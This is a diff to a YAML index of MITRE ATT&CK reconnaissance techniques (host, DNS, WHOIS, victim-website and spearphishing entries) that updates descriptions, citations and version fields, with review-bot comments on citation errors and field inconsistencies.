x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
reconnaissance:
T1592:
technique:
- x_mitre_platforms:
- - PRE
+ modified: '2024-10-03T19:35:07.269Z'
+ name: Gather Victim Host Information
+ description: |-
+ Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).
+
+ Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).
+
+ Adversaries may also gather victim host information via User-Agent HTTP headers, which are sent to a server to identify the application, operating system, vendor, and/or version of the requesting user agent. This can be used to inform the adversary’s follow-on action. For example, adversaries may check user agents for the requesting operating system, then only serve malware for target operating systems while ignoring others.(Citation: TrellixQakbot)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ x_mitre_contributors:
+ - Sam Seabrook, Duke Energy
+ x_mitre_deprecated: false
+ x_mitre_detection: |-
+ Internet scanners may be used to look for patterns associated with malicious content designed to collect host information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)
+
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
x_mitre_domains:
- enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.2'
+ x_mitre_data_sources:
+ - 'Internet Scan: Response Content'
type: attack-pattern
+ id: attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f
created: '2020-10-02T16:39:33.966Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1592
url: https://attack.mitre.org/techniques/T1592
+ external_id: T1592
- source_name: ATT ScanBox
- url: https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks
description: 'Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework
Used with Watering Hole Attacks. Retrieved October 19, 2020.'
+ url: https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks
+ - source_name: TrellixQakbot
+ description: Pham Duy Phuc, John Fokker J.E., Alejandro Houspanossian and
+ Mathanraj Thangaraju. (2023, March 7). Qakbot Evolves to OneNote Malware
+ Distribution. Retrieved August 1, 2024.
+ url: https://www.trellix.com/blogs/research/qakbot-evolves-to-onenote-malware-distribution/
- source_name: ThreatConnect Infrastructure Dec 2020
- url: https://threatconnect.com/blog/infrastructure-research-hunting/
description: 'ThreatConnect. (2020, December 15). Infrastructure Research
and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
- modified: '2022-04-25T14:00:00.188Z'
- name: Gather Victim Host Information
- description: |-
- Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).
-
- Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: reconnaissance
- x_mitre_detection: |-
- Internet scanners may be used to look for patterns associated with malicious content designed to collect host information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)
-
- Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
- x_mitre_version: '1.1'
+ url: https://threatconnect.com/blog/infrastructure-research-hunting/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- x_mitre_data_sources:
- - 'Internet Scan: Response Content'
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1596.003:
technique:
@@ -60928,7 +61605,7 @@ reconnaissance:
url: https://medium.com/@menakajain/export-download-ssl-certificate-from-server-site-url-bcfc41ea46a2
description: Jain, M. (2019, September 16). Export & Download — SSL Certificate
from Server (Site URL). Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:48:37.628Z'
name: Digital Certificates
description: |-
Adversaries may search public digital certificate data for information about victims that can be used during targeting. Digital certificates are issued by a certificate authority (CA) in order to cryptographically verify the origin of signed content. These certificates, such as those used for encrypted web traffic (HTTPS SSL/TLS communications), contain information about the registered organization such as name and location.
@@ -60944,8 +61621,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1597.002:
technique:
@@ -60967,7 +61642,7 @@ reconnaissance:
url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
73 million user records on the dark web. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:44:43.900Z'
name: Purchase Technical Data
description: |-
Adversaries may purchase technical information about victims that can be used during targeting. Information about victims may be available for purchase within reputable private sources and databases, such as paid subscriptions to feeds of scan databases or other data aggregation services. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.
@@ -60983,8 +61658,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1590.005:
technique:
@@ -61012,7 +61685,7 @@ reconnaissance:
url: https://www.circl.lu/services/passive-dns/
description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:31:05.302Z'
name: IP Addresses
description: |-
Adversaries may gather the victim's IP addresses that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. Information about assigned IP addresses may include a variety of details, such as which IP addresses are in use. IP addresses may also enable an adversary to derive other details about a victim, such as organizational size, physical location(s), Internet service provider, and or where/how their publicly-facing infrastructure is hosted.
@@ -61028,33 +61701,33 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1590.002:
technique:
- modified: '2022-10-21T14:32:48.393Z'
+ modified: '2024-11-11T16:13:02.196Z'
name: DNS
description: |-
- Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. DNS, MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.(Citation: Sean Metcalf Twitter DNS Records)
+ Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. DNS MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.(Citation: Sean Metcalf Twitter DNS Records)
Adversaries may gather this information in various ways, such as querying or otherwise collecting details via [DNS/Passive DNS](https://attack.mitre.org/techniques/T1596/001). DNS information may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Active Scanning](https://attack.mitre.org/techniques/T1595)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).
+
+ Adversaries may also use DNS zone transfer (DNS query type AXFR) to collect all records from a misconfigured DNS server.(Citation: Trails-DNS)(Citation: DNS-CISA)(Citation: Alexa-dns)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_contributors:
+ - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+ x_mitre_deprecated: false
x_mitre_detection: |-
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
- x_mitre_platforms:
- - PRE
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
- x_mitre_version: '1.1'
- x_mitre_contributors:
- - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.2'
type: attack-pattern
id: attack-pattern--0ff59227-8aa8-4c09-bf1f-925605bd07ea
created: '2020-10-02T15:47:10.102Z'
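Review bot: the new paragraph `+ Adversaries may also use DNS zone transfer (DNS query type AXFR) to collect all records from a misconfigured DNS server.` is not reflected in `x_mitre_detection`, which still says the activity takes place outside the target's visibility. Unlike passive lookups, an AXFR request is sent to the victim's own authoritative name server, so it is one of the few reconnaissance steps the target can actually log and alert on; the wording is upstream ATT&CK text and belongs in an upstream issue, but the index should not be read as implying zone transfers are undetectable. Two smaller points in the same hunk: at the top, T1590.005 loses `x_mitre_attack_spec_version: 2.1.0` with nothing replacing it while T1590.002 below is bumped to 3.2.0, leaving the two objects with different field sets; and the description change from `DNS, MX, TXT, and SPF records` to `DNS MX, TXT, and SPF records` is correct, since MX, TXT and SPF are DNS record types rather than peers of DNS.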
@@ -61068,18 +61741,29 @@ reconnaissance:
description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
Retrieved October 20, 2020.
url: https://www.circl.lu/services/passive-dns/
+ - source_name: DNS-CISA
+ description: CISA. (2016, September 29). DNS Zone Transfer AXFR Requests May
+ Leak Domain Information. Retrieved June 5, 2024.
+ url: https://www.cisa.gov/news-events/alerts/2015/04/13/dns-zone-transfer-axfr-requests-may-leak-domain-information
- source_name: DNS Dumpster
description: Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.
url: https://dnsdumpster.com/
+ - source_name: Alexa-dns
+ description: Scanning Alexa's Top 1M for AXFR. (2015, March 29). Retrieved
+ June 5, 2024.
+ url: https://en.internetwache.org/scanning-alexas-top-1m-for-axfr-29-03-2015/
- source_name: Sean Metcalf Twitter DNS Records
description: Sean Metcalf. (2019, May 9). Sean Metcalf Twitter. Retrieved
- May 27, 2022.
- url: https://twitter.com/PyroTek3/status/1126487227712921600/photo/1
+ September 12, 2024.
+ url: https://x.com/PyroTek3/status/1126487227712921600
+ - source_name: Trails-DNS
+ description: SecurityTrails. (2018, March 14). Wrong Bind Configuration Exposes
+ the Complete List of Russian TLD's to the Internet. Retrieved June 5, 2024.
+ url: https://web.archive.org/web/20180615055527/https://securitytrails.com/blog/russian-tlds
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1596.002:
technique:
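Review bot: the `DNS-CISA` reference dates the alert `(2016, September 29)` but its URL path is `alerts/2015/04/13`, so one of the two is wrong; the CISA page itself should settle which. The `Alexa-dns` entry has no author and opens with the title, unlike every other entry's `Author. (date). Title.` shape. The Sean Metcalf URL change from `twitter.com/PyroTek3/status/1126487227712921600/photo/1` to `x.com/PyroTek3/status/1126487227712921600` drops the `/photo/1` suffix; confirm the image the citation relies on is still reachable from the bare status URL, or archive it as this patch already does for the ACSC and OPM links.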
@@ -61100,7 +61784,7 @@ reconnaissance:
- source_name: WHOIS
url: https://www.whois.net/
description: NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:50:44.113Z'
name: WHOIS
description: |-
Adversaries may search public WHOIS data for information about victims that can be used during targeting. WHOIS data is stored by regional Internet registries (RIR) responsible for allocating and assigning Internet resources such as domain names. Anyone can query WHOIS servers for information about a registered domain, such as assigned IP blocks, contact information, and DNS nameservers.(Citation: WHOIS)
@@ -61116,39 +61800,37 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1594:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--16cdd21f-da65-4e4f-bc04-dd7d198c7b26
- type: attack-pattern
- created: '2020-10-02T16:51:50.306Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1594
- url: https://attack.mitre.org/techniques/T1594
- - source_name: Comparitech Leak
- url: https://www.comparitech.com/blog/vpn-privacy/350-million-customer-records-exposed-online/
- description: Bischoff, P. (2020, October 15). Broadvoice database of more
- than 350 million customer records exposed online. Retrieved October 20,
- 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-02T18:52:21.278Z'
name: Search Victim-Owned Websites
- description: |-
- Adversaries may search websites owned by the victim for information that can be used during targeting. Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info (ex: [Email Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may also have details highlighting business operations and relationships.(Citation: Comparitech Leak)
-
- Adversaries may search victim-owned websites to gather actionable information. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199) or [Phishing](https://attack.mitre.org/techniques/T1566)).
+ description: "Adversaries may search websites owned by the victim for information
+ that can be used during targeting. Victim-owned websites may contain a variety
+ of details, including names of departments/divisions, physical locations,
+ and data about key employees such as names, roles, and contact info (ex: [Email
+ Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may
+ also have details highlighting business operations and relationships.(Citation:
+ Comparitech Leak)\n\nAdversaries may search victim-owned websites to gather
+ actionable information. Information from these sources may reveal opportunities
+ for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598)
+ or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)),
+ establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585)
+ or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or
+ initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199)
+ or [Phishing](https://attack.mitre.org/techniques/T1566)).\n\nIn addition
+ to manually browsing the website, adversaries may attempt to identify hidden
+ directories or files that could contain additional sensitive information or
+ vulnerable functionality. They may do this through automated activities such
+ as [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003), as
+ well as by leveraging files such as sitemap.xml and robots.txt.(Citation:
+ Perez Sitemap XML 2023)(Citation: Register Robots TXT 2015) "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_contributors:
+ - James P Callahan, Professional Paranoid
+ x_mitre_deprecated: false
x_mitre_detection: Monitor for suspicious network traffic that could be indicative
of adversary reconnaissance, such as rapid successions of requests indicative
of web crawling and/or large quantities of requests originating from a single
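Review bot: the T1594 description is re-emitted as a double-quoted scalar with literal `\n\n` sequences and a trailing space before the closing quote (`...(Citation: Register Robots TXT 2015) "`), while the surrounding objects use `|-` block scalars. Both parse, but the quoted form hides the one real content change (the new sitemap.xml and robots.txt paragraph) inside a wall of reflowed text, and the trailing space will survive into the rendered description; have the generator emit block scalars and strip trailing whitespace before serializing.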
@@ -61156,13 +61838,41 @@ reconnaissance:
Analyzing web metadata may also reveal artifacts that can be attributed to
potentially malicious activity, such as referer or user-agent string HTTP/S
fields.
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--16cdd21f-da65-4e4f-bc04-dd7d198c7b26
+ created: '2020-10-02T16:51:50.306Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1594
+ external_id: T1594
+ - source_name: Perez Sitemap XML 2023
+ description: Adi Perez. (2023, February 22). How Attackers Can Misuse Sitemaps
+ to Enumerate Users and Discover Sensitive Information. Retrieved July 18,
+ 2024.
+ url: https://medium.com/@adimenia/how-attackers-can-misuse-sitemaps-to-enumerate-users-and-discover-sensitive-information-361a5065857a
+ - source_name: Comparitech Leak
+ description: Bischoff, P. (2020, October 15). Broadvoice database of more
+ than 350 million customer records exposed online. Retrieved October 20,
+ 2020.
+ url: https://www.comparitech.com/blog/vpn-privacy/350-million-customer-records-exposed-online/
+ - source_name: Register Robots TXT 2015
+ description: Darren Pauli. (2015, May 19). Robots.txt tells hackers the places
+ you don't want them to look. Retrieved July 18, 2024.
+ url: https://www.theregister.com/2015/05/19/robotstxt/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1596.001:
technique:
@@ -61187,7 +61897,7 @@ reconnaissance:
url: https://www.circl.lu/services/passive-dns/
description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:49:13.409Z'
name: DNS/Passive DNS
description: |-
Adversaries may search DNS data for information about victims that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts.
@@ -61203,8 +61913,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1591.003:
technique:
@@ -61226,7 +61934,7 @@ reconnaissance:
url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
Personal Voicemail Transcripts. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:38:31.983Z'
name: Identify Business Tempo
description: |-
Adversaries may gather information about the victim's business tempo that can be used during targeting. Information about an organization’s business tempo may include a variety of details, including operational hours/days of the week. This information may also reveal times/dates of purchases and shipments of the victim’s hardware and software resources.
@@ -61242,8 +61950,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1592.001:
technique:
@@ -61269,7 +61975,7 @@ reconnaissance:
url: https://threatconnect.com/blog/infrastructure-research-hunting/
description: 'ThreatConnect. (2020, December 15). Infrastructure Research
and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T16:32:10.810Z'
name: 'Gather Victim Host Information: Hardware'
description: |-
Adversaries may gather information about the victim's host hardware that can be used during targeting. Information about hardware infrastructure may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: card/biometric readers, dedicated encryption hardware, etc.).
@@ -61287,13 +61993,11 @@ reconnaissance:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1592.001
atomic_tests: []
T1598.003:
technique:
- modified: '2024-04-19T13:26:16.082Z'
+ modified: '2024-05-31T04:18:44.567Z'
name: Spearphishing Link
description: |-
Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
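Review bot: T1592.001 keeps an `identifier: T1592.001` key between `x_mitre_data_sources` and `atomic_tests`, but its sibling T1592.004 later in this patch has no `identifier` line in the same position (its `x_mitre_data_sources` block is followed directly by `atomic_tests: []`), and none of the other objects shown carry one. Either the key is meaningful and should be emitted for every technique, or it is a leftover and should be dropped here; as it stands, a consumer that reads `identifier` gets it for one technique only.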
@@ -61349,7 +62053,7 @@ reconnaissance:
- source_name: ACSC Email Spoofing
description: Australian Cyber Security Centre. (2012, December). Mitigating
Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
- url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
- source_name: TrendMictro Phishing
description: Babon, P. (2020, September 3). Tricky 'Forms' of Phishing. Retrieved
October 20, 2020.
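Review bot: replacing the dead cyber.gov.au PDF with a web.archive.org snapshot is the right fix for T1598.003, but the same `ACSC Email Spoofing` reference is deleted from T1598.002 at the end of this patch (in the `-` block under Spearphishing Attachment) and its replacement block falls outside this excerpt; check that the re-added entry uses the archived URL too, so the two techniques do not cite different copies of one document.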
@@ -61400,7 +62104,6 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1590.004:
technique:
@@ -61421,7 +62124,7 @@ reconnaissance:
- source_name: DNS Dumpster
url: https://dnsdumpster.com/
description: Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:33:02.476Z'
name: Network Topology
description: |-
Adversaries may gather information about the victim's network topology that can be used during targeting. Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments. This information may also include specifics regarding network devices (gateways, routers, etc.) and other infrastructure.
@@ -61437,8 +62140,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1590.003:
technique:
@@ -61460,7 +62161,7 @@ reconnaissance:
url: https://www.slideshare.net/rootedcon/carlos-garca-pentesting-active-directory-forests-rooted2019
description: García, C. (2019, April 3). Pentesting Active Directory Forests.
Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:34:22.917Z'
name: Network Trust Dependencies
description: |-
Adversaries may gather information about the victim's network trust dependencies that can be used during targeting. Information about network trusts may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access.
@@ -61476,8 +62177,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1597.001:
technique:
@@ -61499,7 +62198,7 @@ reconnaissance:
url: https://d3security.com/blog/10-of-the-best-open-source-threat-intelligence-feeds/
description: Banerd, W. (2019, April 30). 10 of the Best Open Source Threat
Intelligence Feeds. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:45:30.862Z'
name: Threat Intel Vendors
description: |-
Adversaries may search private data from threat intelligence vendors for information that can be used during targeting. Threat intelligence vendors may offer paid feeds or portals that offer more data than what is publicly reported. Although sensitive details (such as customer names and other identifiers) may be redacted, this information may contain trends regarding breaches such as target industries, attribution claims, and successful TTPs/countermeasures.(Citation: D3Secutrity CTI Feeds)
@@ -61515,12 +62214,10 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1589:
technique:
- modified: '2024-04-19T04:27:00.005Z'
+ modified: '2024-09-16T16:09:45.794Z'
name: Gather Victim Identity Information
description: |-
Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, security question responses, etc.) as well as sensitive details such as credentials or multi-factor authentication (MFA) configurations.
@@ -61560,8 +62257,8 @@ reconnaissance:
external_id: T1589
- source_name: OPM Leak
description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
- Retrieved October 20, 2020.
- url: https://www.opm.gov/cybersecurity/cybersecurity-incidents/
+ Retrieved September 16, 2024.
+ url: https://web.archive.org/web/20230602111604/https://www.opm.gov/cybersecurity/cybersecurity-incidents/
- source_name: Detectify Slack Tokens
description: Detectify. (2016, April 28). Slack bot token leakage exposing
business critical information. Retrieved October 19, 2020.
@@ -61606,11 +62303,10 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1595.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T13:37:31.317Z'
name: Vulnerability Scanning
description: |-
Adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software and version) potentially aligns with the target of a specific exploit the adversary may seek to use.
@@ -61650,9 +62346,8 @@ reconnaissance:
url: https://owasp.org/www-project-automated-threats-to-web-applications/assets/oats/EN/OAT-014_Vulnerability_Scanning
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
